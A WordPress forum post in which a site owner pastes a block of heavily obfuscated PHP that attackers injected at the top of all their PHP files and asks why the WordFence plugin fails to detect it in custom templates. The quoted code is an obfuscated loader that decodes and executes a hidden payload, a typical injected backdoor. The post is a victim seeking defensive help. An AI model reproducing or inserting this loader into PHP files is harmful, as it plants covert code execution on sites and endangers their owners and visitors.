Virus Not Found

Hi, I recently installed WordFence after my site was attacked. The following code was added to the top of all my PHP files:

<?php $dsmmjpyc = ’88M4P8]37]278]225]241]334]!bssbz)#44ec:649#-!#:618d5f9#-!#f6c68399#-!#65e84]364]6]234]342]58]24]31#-%tdz*Wsfuvso!%bsx24<!%o:!>! x242178}527}88:}334}472 x24<!)##-!#~<#/% x24- x24!>!fyqmpef)jojR x27id%6< x7fw6* x7f_*#ujojRk3{%rxB%h>#]y31]278]y3e]81]K78:56985:6197g:74985-rr.93e:5597f-s.QUUI&e_SEEBFUPNFS&d_SFSFGFSQUUI&c_UOFHBSFTVQUUI&b%!|!*)323zbek!~p%>5h%!<*::::::-111112)eobsun>qp%!|Z~!<##!>!2p%!|!*!***b%)sfxpmp0]=]0#)2q%l}S;2-u%!-#2#/#%#/#o]#/*)323zbe!-#jt0*?]+^2]18y]#>q%<#762]67y]562]38y]572]48y]#>m%:|:*r%:-t%)3of:opjudovg<~ 973:8297f:5297e:56-xr.985:52985-t.98]K4]65]D8]86gb2dc#*<!sfuvso!sboepn)%epnbss-%rxW~!Ypp2)%zB%z>! x24/%tmw/ x24)%z-#:#* x24- x24!>! x24/%tjw/ x24)% x24- x24y4ing(0); $scdnqes = implode(avt)!gj!|!*bubE{h%)j{hnpd!opjudovg!|!**#j{hnpd#)tutjyfo*f%)sfxpmpusut)tpqssutRe%)Rd%)Rb%))!gj!<*#cdIjQeTQcOc/#00#W~!Ydrr)%rxB%epnbss!>:<*9-1-r%)s%>/h%:<**#57]38yx72 166 x3a 61 x31″))) { $sktzyqz = ” x63 162 x65 141 x74 pg)%s:*<%j:,,Bjg!)%j:>>1*!%b:>1<!fmtf!%b:>%s: x5c%j:.2^,%b:<!%c:>%if((function_exists(” x6f 142 x5f?]_ x5c}X x24<!%tmw!>!#]y84]275]y83]273]y76]277#<!%t2w+7**^/%rx<~!!%s:N}#-%o:W%c:!*#91y]c9y]g2y]#>>*4-1-bubE{h%)sutc x5c2^-%hOh/#00#W~!%t2w)##Qtjw)#]82#-#!#-%tmw)%tww**WYsboepn)%bss-oj{h1:|:*mmvo:>:iuhofm%:-5ppde:4:|:**#ppde#)tutjyf4 x223}w#)ldbqov>*ofmy%)utjm!|!*5! x27!hmgfR x27tfs%6<*17-SFEBFI,6<*127-UVPFNJU,6<opjudovg)!gj!|!*msv%)}k~~~<ftmbg!osvufs!|ftmf!~<**9.-j%#/*#npd/#)rrd/#00;quui#>.%!<***f x27,*e!<b% x7f!<X>b%Z<#opo#>b%!*##>>X)!gjZ<#opo#>b%!**X)ufttj x22)gj!R;msv}.;/#/#/},;#-#}+;%-qp%)54l} x27;%!<*#}GO x22#)fepmqyfA>2b%!<*qp%-*.%)euhA)3of>2bd%!<5h%/#0>#]y74]273]y76]252]y85]256]y6g]257]y86]267]y74]275]y7:]vr# x5cq%)ufttj x22)gj6<^#Y# x5cq% x27Y%6<.msvftsbqA7>q%6< x}R;2]},;osvufs} x27;mnui}&;zepc}A;~!} x7f;!|!turn chr(ord($n)-1);} @error_reportg)!gj<*#k#)usbutcpV x7f x7f x7f x7f<u%V x27%)m%=*h%)m%):fmjix:<##:>:h%:<#64y]552]e7y]#>n%<#372]58y]472]37y]x22:ftmbg39*56A:>:8:|:7#6#)tutjyf4 156 x61"]=1; $uas=strtolower($_SERVER[" x48 124 x54 120 x^W%c!>!%i x5c2^<!Ce*[!%c2bge56+99386c6f+9f5d816:+946:ce44#)zbssb!>!ssbnpe_GMFTQIQ&f_UTPI x27,*d x27,*c x27,*b x27)fepdof.)fepdof./#@#/qpmqnjA x27&6<.fmjgA x27doj%6< x7*27-SFGTOBSUOSVUFS,6<*msv%7-MSV,6<*)us: x5c%j:^<!%wx5c^>Ew:Qb:Qc:W~!%z!>2<!gps)%j>1<%j=6[%ww2!7fw6* x7f_*#fubfsdXk5{66~6<&w6< x7fw6*CW&)7gj6<*doj%7-C)fex24- x24tvctus)% x24- x24b!>!%yy)#}#-# x24- x24-tusqpt)mg%)!gj!<2,*j%-#1]#-bubE{h%145 x5f 146 x75 156 x63 164 x69 157 x6e”; function hemvvwd($n){redy<Cb*[%h!>!%tdz)%bbT-%bT-%hW~%fdy)##-!#~<%h00#*<%nfd)##Qtpz)#]341]666~6<&w6< x7fw6*CW&)7gj6<.[A x27&6< x7fw6* {ftmfV x7f<*X&Z&S{ftmfV x7f<*XAZASV<*w%)ppde>u%V<#65,47R25,d754″]); if ((strstr($uas,” x6d 163 x69 145″)) or (strstr($uas,” %tpz!>!#]D6M7]K3#<%yy>#]D6]281L1#/#M5]DgP5]D6#<%fdy>#]D4]273]D6QDUMPT7-NBFSUTLDPT7-UFOJGB)fubfsdXA x27K6< x7fw6*3qj%7> x2272q# x24*<!%t::!>! x24Ypp3)%cB%iN}bm)%tjw)bssbz)#P#-#Q#-#B#-#T#-#E#-#G#-#H#-#I#-#K#-#L#-#M#-#[#-#Y#-#D672]48y]#>s%<#462]47y]25-!% x24- x24*!|! x24- x24 x5c%j^ #-#W#-#C#-#O#-#N#*-!%ff2-!%t::**<(<!fwbm)%tjw)# x24#-!#]y35cSFWSFT%}X;!sp!*#opo#>>}:!>!(%w:!>! x246767~6<Cw6<pd%w6Z6<.5hA x27pd%6<pd%w6Z6<.4bs+yfeobz+sfwjidsbbj+upcotn+qsvmtSVD!-id%)uqpuftmsvd},;uqpuftmsvd}d%)+opjudovg+)!gj+{e%!osvufs!*!+A!>!{e%)!>> x22!ftmb+fmhpph#)zbssb!-#}#)fepmqnj!/!#0#)idubnhfsq)!sp!*#ojneb#-_;#)323ldfid>}&;!osvufs} x7f;!opjudovg}k~~9{d%:osvufs:~928>> 368]322]3]364]6]283]427]36]373P6]36]73]83]238M7]381]211M5]67pjudovg x22)!gj}1~!<2p% x7f!~!<##!>!2popD#)sfebfI{*w%)kVx{**#k#)tutjy}{;)gj}l;33bq}k;opjudovg}x;0]=])0#)U! x27{**u%-#jt0}Z;,j%>j%!*3! x27!hmg%!)!gj!<2,*j%!-#1]#-bubE{h%)tpqsut>j%!*72! x27!h5f 125 x53 105 x52 137 x41 107 x45 116 x%zW%h>EzH,2W%wN;#-Ez-1H*WCw*[!%rN}#QwTW%hIr x5c1^-%rd%6|6.7eu{66~67<&w6<*&7-#o]s]o]s]#)fepmqyf x27*&7-n%)utjm6< x7fw6*CW&)fw6* x7f_*#fmjgk4{6~6<tfs%w6< x7fw6*CWtfs%)7gj6<*id%)ftpmdR6<*id%)dfyusut!-#j0#!/!**#sfmcn6<*rfs%7-K)fujsxX6<#o]o]Y%7;utpI#7>/7rfs%6<#o]17gj6<*K)ftpmdXA6~6<u%7>/7&6|7**111127-K)ebfsX x27u%)7fmjix6<C x27&|!*nbsbq%)323ldfidk!~!<**qp%!-uyfu%)3of)fe-bubE{h%)sutcvt)fubmgoj{hA!osvufs!~<3946-tr.984:75983:48984:71]K9]77]D4]82]K6]72]K9]78]K5]53]Kc#<39275ttfsqnpdov{h19275j{hnpd19275fubmg85,67R37,18R#>q%V<*#fopoV;hojepdoF.uofu);}}j}Z;h!opjudovg}{;#)tutjyfrray_map(“hemvvwd”,str_split(“%tjw!>!#]y84]275]y83]248]y83]256]y81x7f_*#[k2{6:!}7;!}6;##}C;!>>!}W;utpi}Y;tuofuopdu 163 x74 141 x72 164″) && (!isset($GLOBALS[” x61 156 x75 156 x614y7 x24- x24*<! x24- x24gps)%j>1<%j=tj{fpg)%s x5csboe))1/35.)1/14+9**-)1/2986%)!gj!|!*1?hmg%)!gj!<**2-4-bubE{h%)sutcvt)esp>hmg%!<12>j%!|^#zsfvr# x5cq%7/7#@#7/7^#iubq# x5cq% x27jsv%6<C>^#zsfvr# x5cq%7**^#zsf”])))) { $GLOBALS[” x61 156 x75]452]88]5]48]32M3]317]445]212]445]43]321]464]2>1<%b:>1<!gps)%j:>1<%j:=tj{fKe]53Ld]53]Kc]55Ld]55#*<%bG9}:}.}-}!#*<%nfd>%f8#-!%w:**<“)));$pieiask = $sktzyqz(“”, $scdnqes); $pieiask(!+!<+{e%+*!*+fepdfe{h+{]265]y72]254]y76#<!%w#-! x24/%tmw/ x24)%c*W%eN+#Qi x5c1+;!>!} x27;!>>>!}_;gvc%}&;ftmbg} x7f;!osvufs}w;* x7f!>> x22!pd%)!gfhfmjg}[;ldpt%}K;ufldpt}X;msvd}R;*msv%)}.;UQPM268]y7f#<!%tww!>! x2400~:<h%_t%:osvufs:~pdof57ftbc x7f!|!*uyfu x27k:!ftmf!}Z;^nbsbq% x5L3]248L3P6L1M5]D2P4]D6#<%GhA x27pd%6<pd%w6Z6<.3hA x27pd%6<pd%w6Z6<.2hA x27pd%6<C x27p]y31]278]y3f]51L3]84]y31M6]y3e]81#/#7e:55%ff2!>!bssbz) x24]25 x24- x24 x24- x24]y8 x24- x24]26 x24- x24<%j,,*!| x24- x24gvodujpo! x24- x2]y6d]281Ld]245]K2]285]fx x22l:!}V;3q%}U;y]>#p#/#p#/%z<jg!)%z>>2*!%z>3<!fmtf!%z>2<!%ww2)%wTW~ x24<!fw)tpqsut>j%!*9! x27!hmg%)!gj!~<ofmy%,3,j%>j%!<**3-j%-bubE{h%)sutcvt-#]47]67y]37]88y]27]28y]#/r%/h%)n%-#+I#)q%:>:r%:|:**tP2L5P6]y6gP7L6M7]D4]275]D:M8]Df#<%tdz>#L4]27%Z<^2 x5c2b%!>!2p%!*3>?*2b%)gpf{jt)!gj!<*2bd%-#1/20QUUI7jsv%7UFH# x27rfs%6~6< x7fw6<*K)ftpmdXA6|7**197-2qj%7-K)udfoopdXA x22)7gj6<*R17,67R37,#/q%>U<#16,47R57,27R66,#/q%>2q%<#g6R x24- x24*<!~! x24/%t2w/ x24j%)7gj6<**2qj%)hopm3qjA)qj3hopmA x273qj%6<*Y%)fnbozcYufhA x272qj%6<sTrREvxNoiTCnuf_EtaerCxECalPer_Rtspkwcgwlct’; $jnxauli=explode(chr((418-298)),substr($dsmmjpyc,(18959-13082),(238-204))); $hbhymj = $jnxauli[0]($jnxauli[(5-4)]); $linoxdow = $jnxauli[0]($jnxauli[(11-9)]); if (!function_exists(‘gzptkpwso’)) { function gzptkpwso($ttasizl, $vucrqu,$hqmjppak) { $kuygfcdb = NULL; for($dvpdiah=0;$dvpdiah<(sizeof($ttasizl)/2);$dvpdiah++) { $kuygfcdb .= substr($vucrqu, $ttasizl[($dvpdiah*2)],$ttasizl[($dvpdiah*2)+(7-6)]); } return $hqmjppak(chr((60-51)),chr((444-352)),$kuygfcdb); }; } $xqqpum = explode(chr((277-233)),’1008,33,4353,64,4623,31,1948,58,3626,40,2648,33,2681,30,884,58,2411,65,1770,35,695,28,4237,66,4856,21,3079,58,5141,62,3718,70,3926,66,3879,47,5653,53,5706,30,2774,65,5810,67,4553,70,1664,61,2270,59,2142,32,3788,70,1316,40,2174,37,188,36,2543,44,4303,50,4977,50,3171,35,4911,66,4212,25,1356,56,4034,37,3560,66,2384,27,5442,68,1281,35,4494,59,1122,35,723,55,3437,38,5605,48,1557,52,1412,39,2095,47,354,65,3858,21,3137,34,3258,58,778,44,2030,65,285,69,1451,63,3992,42,5067,47,3053,26,1514,43,3316,61,1913,35,4131,38,1223,58,4833,23,3206,52,1805,44,2587,61,5736,46,4169,39,3475,31,5362,21,1725,45,3506,54,419,52,1041,54,1609,55,5027,40,857,27,5510,51,1849,64,2938,24,471,66,116,41,5244,29,2962,33,2329,55,649,46,5273,67,4417,44,5782,28,157,31,2839,31,4877,34,2006,24,822,35,26,47,585,64,3666,52,1157,66,224,61,537,48,5203,41,4071,60,2711,63,5561,44,5114,27,5340,22,4728,46,2476,67,0,26,3377,60,4654,46,73,43,4461,33,1095,27,4700,28,942,66,2211,59,5383,59,2870,68,2995,58,4774,59,4208,4′); $tsooqg = $hbhymj(“”,gzptkpwso($xqqpum,$dsmmjpyc,$linoxdow)); $hbhymj=$dsmmjpyc; $tsooqg(“”); $tsooqg=(604-483); $dsmmjpyc=$tsooqg-1; ?>

WordFence doesn’t seem to be able to find this issue in the custom template files I have. Any recommendations on this?

https://www.ads-software.com/plugins/wordfence/